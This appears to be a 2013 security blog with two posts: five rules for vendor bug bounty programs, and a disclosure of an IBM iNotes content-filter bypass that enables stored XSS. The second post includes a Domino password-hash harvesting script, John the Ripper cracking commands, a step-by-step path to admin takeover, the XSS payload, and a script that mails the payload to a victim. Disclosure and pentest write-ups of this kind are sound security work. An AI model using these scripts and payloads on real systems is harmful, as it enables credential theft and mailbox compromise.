Wednesday, August 21, 2013

Five Golden Rules For A Successful Bug Bounty Program

Bug bounty programs have become a popular complement to already existing security practices, like secure software development and security testing. In this space, there are successful examples with many bugs reported and copious rewards paid out. For vendors, users and researchers, this seems to be a mutually beneficial ecosystem.

The truth is that not all bug bounty initiatives have been so successful. In some cases, a great idea was poorly executed, resulting in frustration and headaches for both vendors and researchers. Ineffective programs are mainly caused by security immaturity, as not all companies are ready and motivated enough to organize and maintain such initiatives. Bug bounties are a great complement to other practices, but they cannot completely substitute for professional penetration tests and source code analysis. Many organizations fail to understand that and jump on the bounty bandwagon without having mature security practices in place.

Talking with a bunch of friends during BlackHat/Defcon, we came up with a list of five golden rules to set your bug bounty program up for success. Although the list is not exhaustive, it was built by collecting opinions from numerous peers and should be a good representation of what security researchers expect.

If you are a vendor considering starting a similar initiative, please read it carefully.

The Five Golden Rules:

1. Build trust, with facts
Security testing is based on trust between client and provider. Trust is important during testing, and especially crucial at disclosure time. As a vendor, provide as much clarity as you can. For duplicate bugs, increase your transparency by giving the reporter more details (e.g. date/time of the initial disclosure, original bug ID, etc.). Also, fixing bugs while claiming that they are not relevant (and thus not eligible for rewards) is a perfect way to lose trust.

2. Fast turnaround
Security researchers are happy to spend extra time explaining bugs and providing workarounds; however, they also expect to be notified (and rewarded) with the same reasonable speed. From bug report to reward payout, you should have a fast turnaround. Fast means days - not months. Even if you need more time to fix the bug, pay out the reward immediately and explain in detail the complexity of rolling out the patch. Decoupling internal development life cycles from bounties allows you to be flexible with external reporters while maintaining your standard company processes.

3. Get security experts
If you expect web security bugs, make sure to have web security experts around you. For memory corruption vulnerabilities, you need people able to understand root causes and investigate application crashes. Whether you build this expertise internally or leverage trusted third parties, this aspect is crucial for your reputation. Many of us have experienced situations in which we had to explain basic vulnerabilities and how to replicate them. In several cases, our interlocutors were software engineers rather than security folks: we simply speak different languages and use different tools.

4. Adequate rewards
Make sure that your monetary rewards are aligned with the market. What's adequate? Check Mozilla, Facebook, Google, Etsy and many others. If you don't have enough budget, just set up a wall of fame, send nice swag and be creative. For instance, you could decide to pay only for specific classes of bugs, or only for medium/high impact vulnerabilities. Always paying at the low end of your reward range, even for critical security bugs, is just pathetic. Before starting, crunch some numbers by reviewing past penetration test reports performed by recognized consulting boutiques.

5. Non-eligible bugs
Clarify the scope of the program by providing concrete examples, eligible domains, and the types of bugs that are commonly rejected. Even so, you will have to reject submissions for a multitude of reasons: be as clear and transparent as possible. Spend a few minutes explaining the reason for rejection, especially when the researcher has overestimated the severity or has not properly evaluated the issue.

Happy Bug Hunting, Happy Bug Squashing!

Friday, August 9, 2013

All your (iNotes) emails are belong to me

This post describes a critical bypass of the Active Content Filtering (ACF) mechanism implemented in IBM iNotes to prevent the inclusion of malicious HTML tags in emails. The bug was identified during a web application penetration test and can be exploited to perform stored Cross-Site Scripting (XSS) attacks. The bypass has been successfully verified against IBM iNotes 9, and an official bulletin and fix were released on August 1st, 2013.

From zero to Domino admin in a matter of hours


Earlier this spring I was asked to assess the security of the mail infrastructure owned by a big company here in Italy. Pentesting the Domino/Notes/iNotes ecosystem is nowadays a piece of cake, thanks to the large amount of publicly available documentation, advisories and tools.

If you are interested in testing this kind of infrastructure, I would recommend the following resources.

First of all, Marco Ivaldi's script can be used to automatically download all users' password hashes, together with details about every single account (e.g. name, surname, e-mail address, etc.). By simply accessing the names.nsf web resource, the tool extracts the desired information disclosed by the hidden attribute named HTTPPassword. The extracted hashes can be easily cracked using John the Ripper: William Ghote gave a great talk at BSides Las Vegas 2012 detailing the Lotus Notes password cracking process.
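
For the sake of illustration, the hash-harvesting idea can be sketched in a few lines of Python. To be clear, this is not Marco Ivaldi's script: the view path, document links and HTML parsing below are hypothetical and will differ between Domino deployments (authentication may also be required), so treat it as a rough outline of the technique rather than a working exploit.

import re
import requests

BASE = "https://mail.example.com"                       # hypothetical target
VIEW = BASE + "/names.nsf/People?OpenView&Count=1000"   # person view; path is deployment-specific

def person_links(view_html):
    """Collect links to individual person documents from the rendered view page."""
    return set(re.findall(r'href="(/names\.nsf/[^"]+\?OpenDocument)"', view_html))

def http_password(doc_html):
    """Extract the HTTPPassword hidden field, if the page discloses it."""
    m = re.search(r'name="HTTPPassword"[^>]*value="([^"]*)"', doc_html)
    return m.group(1) if m else None

if __name__ == "__main__":
    view = requests.get(VIEW, verify=False, timeout=10).text
    for link in sorted(person_links(view)):
        doc = requests.get(BASE + link, verify=False, timeout=10).text
        h = http_password(doc)
        if h:
            user = link.rsplit("/", 1)[-1].split("?")[0]
            print(f"{user}:{h}")   # user:hash lines, ready to be fed to John the Ripper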

Finally, Penetration from application down to OS - Lotus Domino by Alexandr Polyakov and Lotus Domino: Penetration Through the Controller by Alexey Sintsov complete the picture, providing even more details on how to pentest Lotus Domino deployments.

The links above are amazing resources that describe, step by step, how to easily hack into a mail infrastructure based on IBM solutions. In my experience, a standard attack pattern to breach the Domino/iNotes infrastructure and access all of the company's e-mail accounts can be summarized as follows:

  1. Identify the location/path of the names.nsf web resource;
  2. Identify the user(s) with administrative privileges;
  3. Verify the user's password hash disclosure via the HTTPPassword hidden attribute;
  4. Get all the administrators' password hashes;
  5. Crack the obtained hashes with John the Ripper;
  6. Log into the Domino Web Administrator application and have a drink.
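
As a minimal sketch of step 5, assuming the hashes were saved as user:hash lines and a John the Ripper "jumbo" build is available, the cracking step can be driven as follows. The format flag depends on the hash flavor: lotus5 for the older unsalted hashes, dominosec for the salted ones beginning with "(G".

import subprocess

HASH_FILE = "domino_hashes.txt"   # user:hash lines dumped in the previous step
WORDLIST = "rockyou.txt"          # any wordlist you like

# Crack the hashes; swap --format=dominosec for --format=lotus5 on older deployments
subprocess.run(["john", f"--wordlist={WORDLIST}", "--format=dominosec", HASH_FILE], check=True)

# Display the cracked credentials
subprocess.run(["john", "--show", "--format=dominosec", HASH_FILE], check=True)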

The whole process took less than 30 hours, and I can't hide that, at least this time, the task was as easy as cutting and pasting known attacks against an outdated environment. As my pentest objectives were quickly accomplished, I decided to turn my job into a security research session and dedicated the rest of the engagement to verifying the effectiveness of the aforementioned ACF mechanism.

Active Content Filtering (ACF) vulnerability details


The analysis of the filter started with injecting simple and well-known XSS attack vectors, in order to understand the underlying logic and spot potential defects. On the basis of my analysis - which must be considered an incomplete understanding of the filter's internals, based exclusively on black-box observations - ACF tries to block malicious HTML tags both by commenting out JavaScript code specified via the <script> tag and by normalizing/filtering tag attributes that could lead to client-side code execution (e.g. by eliminating onXYZ event handlers, such as onerror or onmouseover). During the engagement, I found that this filtering is not properly implemented and allows an attacker to inject arbitrary attributes. In detail, the ACF is not able to correctly sanitize the character sequence src="<. For the sake of clarity, the following attack payload:

<img src="< onerror=alert(1) src=x>

would be transformed into:

<img < onerror=alert(1) src=x>

resulting in execution of the JavaScript alert method. Figure 1 shows how the above vector is incorrectly handled and used to set the BodyHtml variable, which contains the HTML body of the e-mail message.

Figure 1 - Bypass of the ACF mechanism and injection of JavaScript code.
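
For completeness, reproducing the issue in a lab boils down to mailing the target account an HTML message whose body carries the payload shown above. A minimal sketch using Python's smtplib - host names and addresses are placeholders - could look like this:

import smtplib
from email.mime.text import MIMEText

payload = '<img src="< onerror=alert(1) src=x>'

# Build an HTML e-mail whose body carries the bypass payload
msg = MIMEText(f"<html><body>{payload}</body></html>", "html")
msg["Subject"] = "ACF bypass test"
msg["From"] = "attacker@example.com"      # placeholder sender
msg["To"] = "victim@example.com"          # placeholder iNotes recipient

with smtplib.SMTP("smtp.example.com", 25) as server:   # placeholder SMTP relay
    server.send_message(msg)

Once the message lands in the victim's iNotes mailbox, rendering it (or, as shown later, just previewing it) triggers the injected onerror handler.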

Conclusion


The ACF bypass can be effectively abused to perform stored XSS attacks against iNotes users. In a real-world attack scenario, the bug could not only be exploited to perform session hijacking, but also be combined with Cross-Site Request Forgery (CSRF) to add a new e-mail forwarding rule to the victim's iNotes application, effectively backdooring the victim's mailbox.

The following video demonstrates the execution of arbitrary JavaScript thanks to the described vulnerability. Moreover, it shows how the mail preview mechanism, if enabled, means that the victim is not even required to open the message in order to trigger the execution of JavaScript code - greatly reducing the required user interaction:





Finally, I would like to thank my colleagues Sandro Zaccarini and Leonardo Rizzi for providing me with the infrastructure to properly investigate this issue, and the IBM Product Security Incident Response Team (PSIRT) for their timely responses and professionalism.